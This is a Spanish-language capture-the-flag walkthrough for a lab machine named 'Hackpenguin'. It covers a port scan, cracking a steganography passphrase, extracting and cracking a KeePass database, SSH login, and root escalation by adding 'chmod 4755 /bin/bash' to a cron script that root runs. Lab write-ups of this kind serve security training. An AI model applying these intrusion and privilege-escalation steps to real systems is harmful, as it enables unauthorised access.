Maquina Hackpenguin CHE

Informacion

- SO ubuntu 22.04 lts

- ip 192.168.1.156

- puertos

- 22 ssh OpenSSH 8.9p1

- 80 http Apache httpd 2.4.52

Servicios y Puertos

22/tcp open  ssh     syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)

| ssh-hostkey: 

|   256 c9:1b:75:e2:c8:92:ec:c8:18:a0:f5:2d:cf:f2:27:ab (ECDSA)

| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBDu/HbKASXd9MIUQQjjaSn8piaIQaZK3+ObjuQtlowQvijvHu0w0AyRqWNLqeAHQk6WCZvOKgDp0TnPClPiGSKU=

|   256 ae:05:d7:49:39:cc:11:0b:2a:17:d8:10:8e:d3:29:e5 (ED25519)

|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIB1qkbTwlEziUY6NS8Cryx+uIC6QjqdZ1gRyxXQXJcYs

80/tcp open  http    syn-ack Apache httpd 2.4.52 ((Ubuntu))

|_http-server-header: Apache/2.4.52 (Ubuntu)

|_http-title: Apache2 Ubuntu Default Page: It works

| http-methods: 

|_  Supported Methods: GET POST OPTIONS HEAD

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Fuzzing Web

- penguin.html

contiene una imagen un poco extraña.

stegseek tiene la solucion.

stegseek --crack pinguino_secreto.jpg $(locate rockyou.txt)

StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Found passphrase: "chocolate"      

[i] Original filename: "penguin.kdbx".

[i] Extracting to "pinguino_secreto.jpg.out".

contiene una base de datos en keepass sacamos el pass con keepass2jhon y arreando.

keepass2john penguin.kdbx > hash

Usaremos la herramienta keepassx2 para ver la base de datos y asi sacar el password del user hackpenguin.

Accediendo al server

> sshpass -p 'pinguinomaravilloso123' ssh hackpenguin@192.168.1.156

conseguimos la primera flag y veremos contenido variado en la carpeta del user .

- script.sh

- archivo.txt

- .bash_history

Escalada de privilegios

con pspy64 observamos que se ejecuta el script que esta en la carpeta del user hackpenguin y lo ejecuta root.

2023/10/29 20:10:01 CMD: UID=0     PID=7483   | /usr/sbin/CRON -f -P 

2023/10/29 20:10:01 CMD: UID=0     PID=7484   | /bin/sh -c bash /home/hackpenguin/script.sh 

2023/10/29 20:10:01 CMD: UID=0     PID=7485   | /bin/sh -c mv archivo.txt /home/hackpenguin/

añadimos al script que cambie el suid de bash

chmod 4755 /bin/bash

ejecutamos bash -p y ya accedemos como root.

bash-5.1# id;hostname;whoami

uid=1000(hackpenguin) gid=1000(hackpenguin) euid=0(root) groups=1000(hackpenguin),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd)

hackpenguin

root

bash-5.1#